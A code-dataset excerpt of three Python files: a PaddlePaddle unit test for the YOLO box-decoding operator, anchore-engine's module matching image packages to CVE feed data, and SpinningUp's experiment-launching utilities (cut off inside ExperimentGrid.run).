ysh329/Paddle
|
50ad9046c9a440564d104eaa354eb9df83a35678
|
[
"Apache-2.0"
] | 4
|
2019-09-30T02:15:34.000Z
|
2019-09-30T02:41:30.000Z
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import division
import unittest
import numpy as np
from op_test import OpTest
from paddle.fluid import core
def sigmoid(x):
return 1.0 / (1.0 + np.exp(-1.0 * x))
def YoloBox(x, img_size, attrs):
n, c, h, w = x.shape
anchors = attrs['anchors']
an_num = int(len(anchors) // 2)
class_num = attrs['class_num']
conf_thresh = attrs['conf_thresh']
downsample = attrs['downsample']
input_size = downsample * h
x = x.reshape((n, an_num, 5 + class_num, h, w)).transpose((0, 1, 3, 4, 2))
pred_box = x[:, :, :, :, :4].copy()
grid_x = np.tile(np.arange(w).reshape((1, w)), (h, 1))
grid_y = np.tile(np.arange(h).reshape((h, 1)), (1, w))
pred_box[:, :, :, :, 0] = (grid_x + sigmoid(pred_box[:, :, :, :, 0])) / w
pred_box[:, :, :, :, 1] = (grid_y + sigmoid(pred_box[:, :, :, :, 1])) / h
anchors = [(anchors[i], anchors[i + 1]) for i in range(0, len(anchors), 2)]
anchors_s = np.array(
[(an_w / input_size, an_h / input_size) for an_w, an_h in anchors])
anchor_w = anchors_s[:, 0:1].reshape((1, an_num, 1, 1))
anchor_h = anchors_s[:, 1:2].reshape((1, an_num, 1, 1))
pred_box[:, :, :, :, 2] = np.exp(pred_box[:, :, :, :, 2]) * anchor_w
pred_box[:, :, :, :, 3] = np.exp(pred_box[:, :, :, :, 3]) * anchor_h
pred_conf = sigmoid(x[:, :, :, :, 4:5])
pred_conf[pred_conf < conf_thresh] = 0.
pred_score = sigmoid(x[:, :, :, :, 5:]) * pred_conf
pred_box = pred_box * (pred_conf > 0.).astype('float32')
pred_box = pred_box.reshape((n, -1, 4))
pred_box[:, :, :2], pred_box[:, :, 2:4] = \
pred_box[:, :, :2] - pred_box[:, :, 2:4] / 2., \
pred_box[:, :, :2] + pred_box[:, :, 2:4] / 2.0
pred_box[:, :, 0] = pred_box[:, :, 0] * img_size[:, 1][:, np.newaxis]
pred_box[:, :, 1] = pred_box[:, :, 1] * img_size[:, 0][:, np.newaxis]
pred_box[:, :, 2] = pred_box[:, :, 2] * img_size[:, 1][:, np.newaxis]
pred_box[:, :, 3] = pred_box[:, :, 3] * img_size[:, 0][:, np.newaxis]
for i in range(len(pred_box)):
pred_box[i, :, 0] = np.clip(pred_box[i, :, 0], 0, np.inf)
pred_box[i, :, 1] = np.clip(pred_box[i, :, 1], 0, np.inf)
pred_box[i, :, 2] = np.clip(pred_box[i, :, 2], -np.inf,
img_size[i, 1] - 1)
pred_box[i, :, 3] = np.clip(pred_box[i, :, 3], -np.inf,
img_size[i, 0] - 1)
return pred_box, pred_score.reshape((n, -1, class_num))
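# --- Hedged worked example of the decoding above (hypothetical raw values) ---
# For a 13x13 grid with downsample=32 (so input_size=416), a cell at grid_x=6,
# grid_y=4 with raw tx = ty = 0 gives a normalized center of
#   bx = (6 + sigmoid(0)) / 13 = 0.5,   by = (4 + 0.5) / 13 ~= 0.346,
# and the anchor (16, 30) gives bw = exp(tw) * 16 / 416, bh = exp(th) * 30 / 416.
# The box is then converted from (cx, cy, w, h) to corner coordinates, scaled
# by the per-image ImgSize, and clipped to the image bounds.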
class TestYoloBoxOp(OpTest):
def setUp(self):
self.initTestCase()
self.op_type = 'yolo_box'
x = np.random.random(self.x_shape).astype('float32')
img_size = np.random.randint(10, 20, self.imgsize_shape).astype('int32')
self.attrs = {
"anchors": self.anchors,
"class_num": self.class_num,
"conf_thresh": self.conf_thresh,
"downsample": self.downsample,
}
self.inputs = {
'X': x,
'ImgSize': img_size,
}
boxes, scores = YoloBox(x, img_size, self.attrs)
self.outputs = {
"Boxes": boxes,
"Scores": scores,
}
def test_check_output(self):
self.check_output()
def initTestCase(self):
self.anchors = [10, 13, 16, 30, 33, 23]
an_num = int(len(self.anchors) // 2)
self.batch_size = 32
self.class_num = 2
self.conf_thresh = 0.5
self.downsample = 32
self.x_shape = (self.batch_size, an_num * (5 + self.class_num), 13, 13)
self.imgsize_shape = (self.batch_size, 2)
if __name__ == "__main__":
unittest.main()
| 36.118644
| 80
| 0.561708
|
fddb4a0361df86b718d4c75e7b6ec40f832e4132
| 15,781
|
py
|
Python
|
anchore_engine/services/policy_engine/engine/vulnerabilities.py
|
Btodhunter/anchore-engine
|
0f7ce6dea5f6c24c07616355affc64fdbfe1d6ef
|
[
"Apache-2.0"
] | null | null | null |
anchore_engine/services/policy_engine/engine/vulnerabilities.py
|
Btodhunter/anchore-engine
|
0f7ce6dea5f6c24c07616355affc64fdbfe1d6ef
|
[
"Apache-2.0"
] | null | null | null |
anchore_engine/services/policy_engine/engine/vulnerabilities.py
|
Btodhunter/anchore-engine
|
0f7ce6dea5f6c24c07616355affc64fdbfe1d6ef
|
[
"Apache-2.0"
] | null | null | null |
"""
Interface for the vulnerabilities subsystem.
This component of the engine is hydrated by data from feeds or a local source.
The evaluation and model side of the system are specific to the data, so this is a layer on top of the
general feeds implementation as it consumes the feed data. Other components should interact with this layer.
Generally, this code has a lot of comments to help explain things since it can be somewhat subtle as to why things
work the way they do and often the behavior is a result of the range of cleanliness of the data itself.
"""
import time
from sqlalchemy import or_
from anchore_engine.db import DistroNamespace, get_thread_scoped_session, get_session
from anchore_engine.db import Vulnerability, ImagePackage, ImagePackageVulnerability
from anchore_engine.common import nonos_package_types, os_package_types
from anchore_engine.services.policy_engine.engine.feeds.db import get_feed_json
import threading
from .logs import get_logger
log = get_logger()
# TODO: introduce a match cache for the fix key and package key to optimize the lookup and updates since it's common to
# see a lot of images with the same versions of packages installed.
class ThreadLocalFeedGroupNameCache:
"""
    Simple cache used during feed syncs to cache name lookups. Here for simpler import paths, used by both feeds.VulnerabilityFeed and vulnerabilities.process_updated_vulnerability functions
"""
feed_list_cache = threading.local()
@classmethod
def lookup(cls, name):
if cls.feed_list_cache and hasattr(cls.feed_list_cache, 'vuln_group_list'):
return cls.feed_list_cache.vuln_group_list and name in cls.feed_list_cache.vuln_group_list
else:
return False
@classmethod
def add(cls, names: list):
try:
            cls.feed_list_cache.vuln_group_list.update(set(names))
except AttributeError:
cls.feed_list_cache.vuln_group_list = set(names)
@classmethod
def flush(cls):
try:
cls.feed_list_cache.vuln_group_list = None
except AttributeError:
pass
def have_vulnerabilities_for(distro_namespace_obj):
"""
Does the system have any vulnerabilities for the given distro.
:param distro_namespace_obj:
:return: boolean
"""
# All options are the same, no need to loop
# Check all options for distro/flavor mappings
db = get_thread_scoped_session()
for namespace_name in distro_namespace_obj.like_namespace_names:
feed = get_feed_json(db_session=db, feed_name='vulnerabilities')
if feed and namespace_name in [x['name'] for x in feed.get('groups', [])]:
# No records yet, but we have the feed, so may just not have any data yet
return True
else:
return False
def namespace_has_no_feed(name, version):
"""
Returns true if the given namespace has no direct CVE feed and false if it does.
:return: boolean if name,version tuple does not have a feed of its own
"""
return not ThreadLocalFeedGroupNameCache.lookup(name + ':' + version)
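# Hedged usage sketch (hypothetical group names, not from the source):
#   ThreadLocalFeedGroupNameCache.add(['alpine:3.8', 'debian:9'])
#   namespace_has_no_feed('alpine', '3.8')  -> False  (a direct feed group is cached)
#   namespace_has_no_feed('centos', '7')    -> True   (no direct feed group cached)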
def find_vulnerable_image_packages(vulnerability_obj):
"""
Given a vulnerability object, find images that are affected via their package manifests.
Result may have duplicates based on match type, caller must de-dup if desired.
:param vulnerability_obj:
:return: list of ImagePackage objects
"""
db = get_thread_scoped_session()
distro, version = vulnerability_obj.namespace_name.split(':', 1)
dist = DistroNamespace(distro, version)
related_names = dist.mapped_names() # Returns list of names that map to this one, not including itself necessarily
# Filter related_names down based on the presence of actual feeds/cve data. If there is an actual feed for a name, remove it from the list.
# Only do this if the list of related names is not just the name itself. (e.g. alpine = [alpine]).
if related_names != [distro]:
# Ensure we don't include any names that actually have a feed (can happen when new feeds arrive before the mapped_names() source
# is updated to break the 'like' relation between the distros.
related_names = [x for x in related_names if namespace_has_no_feed(x, version)]
# This is a weird case because it basically means that this distro doesn't map to itself as far as mapped_names() is
# concerned, but since that could be code lagging data (e.g. new feed group added for a new distro), add the name itself
# back into the list.
if distro not in related_names and not namespace_has_no_feed(distro, version):
related_names.append(distro)
# TODO would like a better way to do the pkg_type <-> namespace_name mapping, with other side in ImagePackage.vulnerabilities_for_package
likematch = None
if ':maven' in vulnerability_obj.namespace_name or 'java' in vulnerability_obj.namespace_name:
likematch = 'java'
elif ':ruby' in vulnerability_obj.namespace_name or 'gem' in vulnerability_obj.namespace_name:
likematch = 'gem'
elif ':js' in vulnerability_obj.namespace_name or 'npm' in vulnerability_obj.namespace_name:
likematch = 'npm'
elif 'python' in vulnerability_obj.namespace_name:
likematch = 'python'
try:
affected = []
if vulnerability_obj.fixed_in:
# Check the fixed_in records
for fix_rec in vulnerability_obj.fixed_in:
package_candidates = []
# Find packages of related distro names with compatible versions, this does not have to be precise, just an initial filter.
pkgs = db.query(ImagePackage).filter(ImagePackage.distro_name.in_(related_names), ImagePackage.distro_version.like(dist.version + '%'), or_(ImagePackage.name == fix_rec.name, ImagePackage.normalized_src_pkg == fix_rec.name)).all()
package_candidates += pkgs
# add non distro candidates
if likematch:
pkgs = db.query(ImagePackage).filter(ImagePackage.pkg_type.in_(nonos_package_types), ImagePackage.pkg_type.like(likematch), or_(ImagePackage.name == fix_rec.name, ImagePackage.normalized_src_pkg == fix_rec.name)).all()
package_candidates += pkgs
for candidate in package_candidates:
if fix_rec.match_but_not_fixed(candidate):
affected.append(candidate)
# if vulnerability_obj.vulnerable_in:
# # Check the vulnerable_in records
# for vuln_rec in vulnerability_obj.vulnerable_in:
# package_candidates = []
# # Find packages of related distro names with compatible versions, this does not have to be precise, just an initial filter.
# pkgs = db.query(ImagePackage).filter(ImagePackage.distro_name.in_(related_names),
# ImagePackage.distro_version.like(dist.version + '%'),
# or_(ImagePackage.name == fix_rec.name,
# ImagePackage.normalized_src_pkg == fix_rec.name)).all()
# package_candidates += pkgs
# for candidate in package_candidates:
# if vuln_rec.match_and_vulnerable(candidate):
# affected.append(candidate)
return affected
except Exception as e:
log.exception('Failed to query and find packages affected by vulnerability: {}'.format(vulnerability_obj))
raise
def vulnerabilities_for_image(image_obj):
"""
Return the list of vulnerabilities for the specified image id by recalculating the matches for the image. Ignores
any persisted matches. Query only, does not update the data. Caller must add returned results to a db session and commit
in order to persist.
:param image_obj: the image
:return: list of ImagePackageVulnerability records for the packages in the given image
"""
# Recompute. Session and persistence in the session is up to the caller
try:
ts = time.time()
computed_vulnerabilties = []
for package in image_obj.packages:
pkg_vulnerabilities = package.vulnerabilities_for_package()
for v in pkg_vulnerabilities:
img_v = ImagePackageVulnerability()
img_v.pkg_image_id = image_obj.id
img_v.pkg_user_id = image_obj.user_id
img_v.pkg_name = package.name
img_v.pkg_type = package.pkg_type
img_v.pkg_arch = package.arch
img_v.pkg_version = package.version
img_v.pkg_path = package.pkg_path
img_v.vulnerability_id = v.vulnerability_id
img_v.vulnerability_namespace_name = v.namespace_name
computed_vulnerabilties.append(img_v)
#log.debug("TIMER VULNERABILITIES: {}".format(time.time() - ts))
return computed_vulnerabilties
except Exception as e:
log.exception('Error computing full vulnerability set for image {}/{}'.format(image_obj.user_id, image_obj.id))
raise
def rescan_image(image_obj, db_session):
"""
Rescan an image for vulnerabilities. Discards old results and rescans and persists new matches based on current data.
:param image_obj:
:param db_session:
:return:
"""
current_vulns = image_obj.vulnerabilities()
log.debug('Removing {} current vulnerabilities for {}/{} to rescan'.format(len(current_vulns), image_obj.user_id, image_obj.id))
for v in current_vulns:
db_session.delete(v)
db_session.flush()
vulns = vulnerabilities_for_image(image_obj)
log.info('Adding {} vulnerabilities from rescan to {}/{}'.format(len(vulns), image_obj.user_id, image_obj.id))
for v in vulns:
db_session.add(v)
db_session.flush()
return vulns
def delete_matches(namespace_name, db_session):
"""
Flush all vuln matches for the specified namespace.
:param namespace_name:
:return: count of records deleted
"""
#for rec in db_session.query(ImagePackageVulnerability).filter(ImagePackageVulnerability.vulnerability_namespace_name == namespace_name):
return db_session.query(ImagePackageVulnerability).filter(ImagePackageVulnerability.vulnerability_namespace_name == namespace_name).delete()
def merge_nvd_metadata_image_packages(dbsession, img_pkg_vulns, nvd_cls, cpe_cls, already_loaded_nvds=None):
"""
Same as merge_nvd_metadata but takes a list of ImagePackageVulnerabilities instead. Returns a list of (img pkg vuln, nvds list) tuples
:param dbsession:
:param img_pkg_vulns:
:param nvd_cls:
:param cpe_cls:
:param already_loaded_nvds:
:return:
"""
merged = merge_nvd_metadata(dbsession, [x.vulnerability for x in img_pkg_vulns], nvd_cls, cpe_cls, already_loaded_nvds)
return zip(img_pkg_vulns, [x[1] for x in merged])
def merge_nvd_metadata(dbsession, vulnerability_objs, nvd_cls, cpe_cls, already_loaded_nvds=None):
"""
Return a list of tuples of (vuln obj, list(nvd records)
:param dbsession active db session to use for query
:param vulnerability_objs: a list of Vulnerability objects
:param nvd_cls the class of nvd object to use for query
:param cpe_cls the class of nvd object to use for query
:return: list of tuples of (Vulnerability, list(NVD objects)) tuples
"""
if already_loaded_nvds is None:
already_loaded_nvds = []
result_list = [[x, x.get_nvd_identifiers(nvd_cls, cpe_cls) if isinstance(x, Vulnerability) else []] for x in vulnerability_objs]
nvd_ids = []
# Zip the ids into the master query list
for id in result_list:
nvd_ids.extend(id[1])
# Dedup
nvd_ids = list(set(nvd_ids).difference({rec.name for rec in already_loaded_nvds}))
# Do the db lookup for all of them
nvd_records = dbsession.query(nvd_cls).filter(nvd_cls.name.in_(nvd_ids)).all()
nvd_records.extend(already_loaded_nvds)
id_map = {x.name: x for x in nvd_records}
# Map back to the records
for entry in result_list:
entry[1] = [id_map[id] for id in entry[1] if id in id_map]
return result_list
def flush_vulnerability_matches(db, feed_name=None, group_name=None):
"""
Delete image vuln matches for the namespacename that matches the group name
:param db:
:param feed_name:
:param group_name:
:return:
"""
count = db.query(ImagePackageVulnerability).filter(ImagePackageVulnerability.vulnerability_namespace_name == group_name).delete()
log.info('Deleted {} vulnerability matches in flush for group {}'.format(count, group_name))
def process_updated_vulnerability(db, vulnerability):
"""
Update vulnerability matches for this vulnerability. This function will add objects to the db session but
will not commit. The caller is expected to manage the session lifecycle.
:param: item: The updated vulnerability object
:param: db: The db session to use, should be valid and open
:return: list of (user_id, image_id) that were affected
"""
log.spew('Processing CVE update for: {}'.format(vulnerability.id))
changed_images = []
# Find any packages already matched with the CVE ID.
current_affected = vulnerability.current_package_vulnerabilities(db)
# May need to remove vuln from some packages.
if vulnerability.is_empty():
log.spew('Detected an empty CVE. Removing all existing matches on this CVE')
# This is a flush, nothing can be vulnerable to this, so remove it from packages.
if current_affected:
log.debug('Detected {} existing matches on CVE {} to remove'.format(len(current_affected), vulnerability.id))
for pkgVuln in current_affected:
log.debug('Removing match on image: {}/{}'.format(pkgVuln.pkg_user_id, pkgVuln.pkg_image_id))
db.delete(pkgVuln)
changed_images.append((pkgVuln.pkg_user_id, pkgVuln.pkg_image_id))
else:
# Find impacted images for the current vulnerability
new_vulnerable_packages = [ImagePackageVulnerability.from_pair(x, vulnerability) for x in find_vulnerable_image_packages(vulnerability)]
unique_vuln_pkgs = set(new_vulnerable_packages)
current_match = set(current_affected)
if len(new_vulnerable_packages) > 0:
log.debug('Found {} packages vulnerable to cve {}'.format(len(new_vulnerable_packages), vulnerability.id))
log.debug('Dedup matches from {} to {}'.format(len(new_vulnerable_packages), len(unique_vuln_pkgs)))
# Find the diffs of any packages that were vulnerable but are no longer.
no_longer_affected = current_match.difference(unique_vuln_pkgs)
possibly_updated = current_match.intersection(unique_vuln_pkgs)
new_matches = unique_vuln_pkgs.difference(current_match)
if len(no_longer_affected) > 0:
log.debug('Found {} packages no longer vulnerable to cve {}'.format(len(no_longer_affected), vulnerability.id))
for img_pkg_vuln in no_longer_affected:
log.debug('Removing old invalid match for pkg {} on cve {}'.format(img_pkg_vuln, vulnerability.id))
db.delete(img_pkg_vuln)
db.flush()
for v in new_matches:
log.debug('Adding new vulnerability match: {}'.format(v))
db.add(v)
changed_images.append((v.pkg_user_id, v.pkg_image_id))
db.flush()
log.spew('Images changed for cve {}: {}'.format(vulnerability.id, changed_images))
return changed_images
| 43.836111
| 246
| 0.694379
|
b1432c59774d01c7b6c307fe92656a61571b8540
| 19,743
|
py
|
Python
|
submodules/teachDeepRL/teachDRL/spinup/utils/run_utils.py
|
JiangZehua/control-pcgrl3D
|
f9b04e65e1cbf70b7306f4df251450d83c6fb2be
|
[
"MIT"
] | null | null | null |
submodules/teachDeepRL/teachDRL/spinup/utils/run_utils.py
|
JiangZehua/control-pcgrl3D
|
f9b04e65e1cbf70b7306f4df251450d83c6fb2be
|
[
"MIT"
] | null | null | null |
submodules/teachDeepRL/teachDRL/spinup/utils/run_utils.py
|
JiangZehua/control-pcgrl3D
|
f9b04e65e1cbf70b7306f4df251450d83c6fb2be
|
[
"MIT"
] | null | null | null |
from teachDRL.spinup.user_config import DEFAULT_DATA_DIR, FORCE_DATESTAMP, \
DEFAULT_SHORTHAND, WAIT_BEFORE_LAUNCH
from teachDRL.spinup.utils.logx import colorize
from teachDRL.spinup.utils.mpi_tools import mpi_fork, msg
from teachDRL.spinup.utils.serialization_utils import convert_json
import base64
from copy import deepcopy
import cloudpickle
import json
import numpy as np
import os
import os.path as osp
import psutil
import string
import subprocess
from subprocess import CalledProcessError
import sys
from textwrap import dedent
import time
from tqdm import trange
import zlib
DIV_LINE_WIDTH = 80
def setup_logger_kwargs(exp_name, seed=None, data_dir=None, datestamp=False):
"""
Sets up the output_dir for a logger and returns a dict for logger kwargs.
If no seed is given and datestamp is false,
::
output_dir = data_dir/exp_name
If a seed is given and datestamp is false,
::
output_dir = data_dir/exp_name/exp_name_s[seed]
If datestamp is true, amend to
::
output_dir = data_dir/YY-MM-DD_exp_name/YY-MM-DD_HH-MM-SS_exp_name_s[seed]
You can force datestamp=True by setting ``FORCE_DATESTAMP=True`` in
``spinup/user_config.py``.
Args:
exp_name (string): Name for experiment.
seed (int): Seed for random number generators used by experiment.
data_dir (string): Path to folder where results should be saved.
Default is the ``DEFAULT_DATA_DIR`` in ``spinup/user_config.py``.
datestamp (bool): Whether to include a date and timestamp in the
name of the save directory.
Returns:
logger_kwargs, a dict containing output_dir and exp_name.
"""
# Datestamp forcing
datestamp = datestamp or FORCE_DATESTAMP
# Make base path
ymd_time = time.strftime("%Y-%m-%d_") if datestamp else ''
relpath = ''.join([ymd_time, exp_name])
if seed is not None:
# Make a seed-specific subfolder in the experiment directory.
if datestamp:
hms_time = time.strftime("%Y-%m-%d_%H-%M-%S")
subfolder = ''.join([hms_time, '-', exp_name, '_s', str(seed)])
else:
subfolder = ''.join([exp_name, '_s', str(seed)])
relpath = osp.join(relpath, subfolder)
data_dir = data_dir or DEFAULT_DATA_DIR
logger_kwargs = dict(output_dir=osp.join(data_dir, relpath),
exp_name=exp_name)
return logger_kwargs
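# Hedged example (hypothetical arguments, assuming FORCE_DATESTAMP is False):
#   setup_logger_kwargs('ppo_bench', seed=3, data_dir='/tmp/spinup_data')
# returns
#   {'output_dir': '/tmp/spinup_data/ppo_bench/ppo_bench_s3', 'exp_name': 'ppo_bench'}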
def call_experiment(exp_name, thunk, seed=0, num_cpu=1, data_dir=None,
datestamp=False, **kwargs):
"""
Run a function (thunk) with hyperparameters (kwargs), plus configuration.
This wraps a few pieces of functionality which are useful when you want
to run many experiments in sequence, including logger configuration and
splitting into multiple processes for MPI.
There's also a SpinningUp-specific convenience added into executing the
thunk: if ``env_name`` is one of the kwargs passed to call_experiment, it's
assumed that the thunk accepts an argument called ``env_fn``, and that
the ``env_fn`` should make a gym environment with the given ``env_name``.
The way the experiment is actually executed is slightly complicated: the
function is serialized to a string, and then ``run_entrypoint.py`` is
executed in a subprocess call with the serialized string as an argument.
``run_entrypoint.py`` unserializes the function call and executes it.
We choose to do it this way---instead of just calling the function
directly here---to avoid leaking state between successive experiments.
Args:
exp_name (string): Name for experiment.
thunk (callable): A python function.
seed (int): Seed for random number generators.
num_cpu (int): Number of MPI processes to split into. Also accepts
'auto', which will set up as many procs as there are cpus on
the machine.
data_dir (string): Used in configuring the logger, to decide where
to store experiment results. Note: if left as None, data_dir will
default to ``DEFAULT_DATA_DIR`` from ``spinup/user_config.py``.
**kwargs: All kwargs to pass to thunk.
"""
# Determine number of CPU cores to run on
num_cpu = psutil.cpu_count(logical=False) if num_cpu=='auto' else num_cpu
# Send random seed to thunk
kwargs['seed'] = seed
# Be friendly and print out your kwargs, so we all know what's up
print(colorize('Running experiment:\n', color='cyan', bold=True))
print(exp_name + '\n')
print(colorize('with kwargs:\n', color='cyan', bold=True))
kwargs_json = convert_json(kwargs)
print(json.dumps(kwargs_json, separators=(',',':\t'), indent=4, sort_keys=True))
print('\n')
# Set up logger output directory
if 'logger_kwargs' not in kwargs:
kwargs['logger_kwargs'] = setup_logger_kwargs(exp_name, seed, data_dir, datestamp)
else:
print('Note: Call experiment is not handling logger_kwargs.\n')
def thunk_plus():
# Make 'env_fn' from 'env_name'
if 'env_name' in kwargs:
import gym
env_name = kwargs['env_name']
kwargs['env_fn'] = lambda : gym.make(env_name)
del kwargs['env_name']
# Fork into multiple processes
mpi_fork(num_cpu)
# Run thunk
thunk(**kwargs)
# Prepare to launch a script to run the experiment
pickled_thunk = cloudpickle.dumps(thunk_plus)
encoded_thunk = base64.b64encode(zlib.compress(pickled_thunk)).decode('utf-8')
entrypoint = osp.join(osp.abspath(osp.dirname(__file__)), 'run_entrypoint.py')
cmd = [sys.executable if sys.executable else 'python', entrypoint, encoded_thunk]
try:
subprocess.check_call(cmd, env=os.environ)
except CalledProcessError:
err_msg = '\n'*3 + '='*DIV_LINE_WIDTH + '\n' + dedent("""
There appears to have been an error in your experiment.
Check the traceback above to see what actually went wrong. The
traceback below, included for completeness (but probably not useful
for diagnosing the error), shows the stack leading up to the
experiment launch.
""") + '='*DIV_LINE_WIDTH + '\n'*3
print(err_msg)
raise
# Tell the user about where results are, and how to check them
logger_kwargs = kwargs['logger_kwargs']
plot_cmd = 'python -m spinup.run plot '+logger_kwargs['output_dir']
plot_cmd = colorize(plot_cmd, 'green')
test_cmd = 'python -m spinup.run test_policy '+logger_kwargs['output_dir']
test_cmd = colorize(test_cmd, 'green')
output_msg = '\n'*5 + '='*DIV_LINE_WIDTH +'\n' + dedent("""\
End of experiment.
Plot results from this run with:
%s
Watch the trained agent with:
%s
"""%(plot_cmd,test_cmd)) + '='*DIV_LINE_WIDTH + '\n'*5
print(output_msg)
def all_bools(vals):
return all([isinstance(v,bool) for v in vals])
def valid_str(v):
"""
Convert a value or values to a string which could go in a filepath.
Partly based on `this gist`_.
.. _`this gist`: https://gist.github.com/seanh/93666
"""
if hasattr(v, '__name__'):
return valid_str(v.__name__)
if isinstance(v, tuple) or isinstance(v, list):
return '-'.join([valid_str(x) for x in v])
# Valid characters are '-', '_', and alphanumeric. Replace invalid chars
# with '-'.
str_v = str(v).lower()
valid_chars = "-_%s%s" % (string.ascii_letters, string.digits)
str_v = ''.join(c if c in valid_chars else '-' for c in str_v)
return str_v
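# Hedged examples of the sanitization above (hypothetical inputs):
#   valid_str('pi_lr')          -> 'pi_lr'
#   valid_str(0.001)            -> '0-001'
#   valid_str(('adam', 0.001))  -> 'adam-0-001'
#   a callable/class with __name__ == 'ReLU' -> 'relu' (via the __name__ branch)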
class ExperimentGrid:
"""
Tool for running many experiments given hyperparameter ranges.
"""
def __init__(self, name=''):
self.keys = []
self.vals = []
self.shs = []
self.in_names = []
self.name(name)
def name(self, _name):
assert isinstance(_name, str), "Name has to be a string."
self._name = _name
def print(self):
"""Print a helpful report about the experiment grid."""
print('='*DIV_LINE_WIDTH)
# Prepare announcement at top of printing. If the ExperimentGrid has a
# short name, write this as one line. If the name is long, break the
# announcement over two lines.
base_msg = 'ExperimentGrid %s runs over parameters:\n'
name_insert = '['+self._name+']'
if len(base_msg%name_insert) <= 80:
msg = base_msg%name_insert
else:
msg = base_msg%(name_insert+'\n')
print(colorize(msg, color='green', bold=True))
# List off parameters, shorthands, and possible values.
for k, v, sh in zip(self.keys, self.vals, self.shs):
color_k = colorize(k.ljust(40), color='cyan', bold=True)
print('', color_k, '['+sh+']' if sh is not None else '', '\n')
for i, val in enumerate(v):
print('\t' + str(convert_json(val)))
print()
# Count up the number of variants. The number counting seeds
# is the total number of experiments that will run; the number not
# counting seeds is the total number of otherwise-unique configs
# being investigated.
nvars_total = int(np.prod([len(v) for v in self.vals]))
if 'seed' in self.keys:
num_seeds = len(self.vals[self.keys.index('seed')])
nvars_seedless = int(nvars_total / num_seeds)
else:
nvars_seedless = nvars_total
print(' Variants, counting seeds: '.ljust(40), nvars_total)
print(' Variants, not counting seeds: '.ljust(40), nvars_seedless)
print()
print('='*DIV_LINE_WIDTH)
def _default_shorthand(self, key):
# Create a default shorthand for the key, built from the first
# three letters of each colon-separated part.
# But if the first three letters contain something that isn't
# alphanumeric, shear that off.
valid_chars = "%s%s" % (string.ascii_letters, string.digits)
def shear(x):
return ''.join(z for z in x[:3] if z in valid_chars)
sh = '-'.join([shear(x) for x in key.split(':')])
return sh
def add(self, key, vals, shorthand=None, in_name=False):
"""
Add a parameter (key) to the grid config, with potential values (vals).
By default, if a shorthand isn't given, one is automatically generated
from the key using the first three letters of each colon-separated
term. To disable this behavior, change ``DEFAULT_SHORTHAND`` in the
``spinup/user_config.py`` file to ``False``.
Args:
key (string): Name of parameter.
vals (value or list of values): Allowed values of parameter.
shorthand (string): Optional, shortened name of parameter. For
example, maybe the parameter ``steps_per_epoch`` is shortened
to ``steps``.
in_name (bool): When constructing variant names, force the
inclusion of this parameter into the name.
"""
assert isinstance(key, str), "Key must be a string."
assert shorthand is None or isinstance(shorthand, str), \
"Shorthand must be a string."
if not isinstance(vals, list):
vals = [vals]
if DEFAULT_SHORTHAND and shorthand is None:
shorthand = self._default_shorthand(key)
self.keys.append(key)
self.vals.append(vals)
self.shs.append(shorthand)
self.in_names.append(in_name)
def variant_name(self, variant):
"""
Given a variant (dict of valid param/value pairs), make an exp_name.
A variant's name is constructed as the grid name (if you've given it
one), plus param names (or shorthands if available) and values
separated by underscores.
Note: if ``seed`` is a parameter, it is not included in the name.
"""
def get_val(v, k):
# Utility method for getting the correct value out of a variant
# given as a nested dict. Assumes that a parameter name, k,
# describes a path into the nested dict, such that k='a:b:c'
# corresponds to value=variant['a']['b']['c']. Uses recursion
# to get this.
if k in v:
return v[k]
else:
splits = k.split(':')
k0, k1 = splits[0], ':'.join(splits[1:])
return get_val(v[k0], k1)
# Start the name off with the name of the variant generator.
var_name = self._name
# Build the rest of the name by looping through all parameters,
# and deciding which ones need to go in there.
for k, v, sh, inn in zip(self.keys, self.vals, self.shs, self.in_names):
# Include a parameter in a name if either 1) it can take multiple
# values, or 2) the user specified that it must appear in the name.
# Except, however, when the parameter is 'seed'. Seed is handled
# differently so that runs of the same experiment, with different
# seeds, will be grouped by experiment name.
if (len(v)>1 or inn) and not(k=='seed'):
# Use the shorthand if available, otherwise the full name.
param_name = sh if sh is not None else k
param_name = valid_str(param_name)
# Get variant value for parameter k
variant_val = get_val(variant, k)
# Append to name
if all_bools(v):
# If this is a param which only takes boolean values,
# only include in the name if it's True for this variant.
var_name += ('_' + param_name) if variant_val else ''
else:
var_name += '_' + param_name + valid_str(variant_val)
return var_name.lstrip('_')
def _variants(self, keys, vals):
"""
Recursively builds list of valid variants.
"""
if len(keys)==1:
pre_variants = [dict()]
else:
pre_variants = self._variants(keys[1:], vals[1:])
variants = []
for val in vals[0]:
for pre_v in pre_variants:
v = {}
v[keys[0]] = val
v.update(pre_v)
variants.append(v)
return variants
def variants(self):
"""
Makes a list of dicts, where each dict is a valid config in the grid.
There is special handling for variant parameters whose names take
the form
``'full:param:name'``.
The colons are taken to indicate that these parameters should
have a nested dict structure. eg, if there are two params,
==================== ===
Key Val
==================== ===
``'base:param:one'`` 1
``'base:param:two'`` 2
==================== ===
the variant dict will have the structure
.. parsed-literal::
variant = {
base: {
param : {
one : 1,
two : 2
}
}
}
"""
flat_variants = self._variants(self.keys, self.vals)
def unflatten_var(var):
"""
Build the full nested dict version of var, based on key names.
"""
new_var = dict()
unflatten_set = set()
for k,v in var.items():
if ':' in k:
splits = k.split(':')
k0 = splits[0]
assert k0 not in new_var or isinstance(new_var[k0], dict), \
"You can't assign multiple values to the same key."
if not(k0 in new_var):
new_var[k0] = dict()
sub_k = ':'.join(splits[1:])
new_var[k0][sub_k] = v
unflatten_set.add(k0)
else:
assert not(k in new_var), \
"You can't assign multiple values to the same key."
new_var[k] = v
# Make sure to fill out the nested dicts.
for k in unflatten_set:
new_var[k] = unflatten_var(new_var[k])
return new_var
new_variants = [unflatten_var(var) for var in flat_variants]
return new_variants
def run(self, thunk, num_cpu=1, data_dir=None, datestamp=False):
"""
Run each variant in the grid with function 'thunk'.
Note: 'thunk' must be either a callable function, or a string. If it is
a string, it must be the name of a parameter whose values are all
callable functions.
Uses ``call_experiment`` to actually launch each experiment, and gives
each variant a name using ``self.variant_name()``.
Maintenance note: the args for ExperimentGrid.run should track closely
to the args for call_experiment. However, ``seed`` is omitted because
we presume the user may add it as a parameter in the grid.
"""
# Print info about self.
self.print()
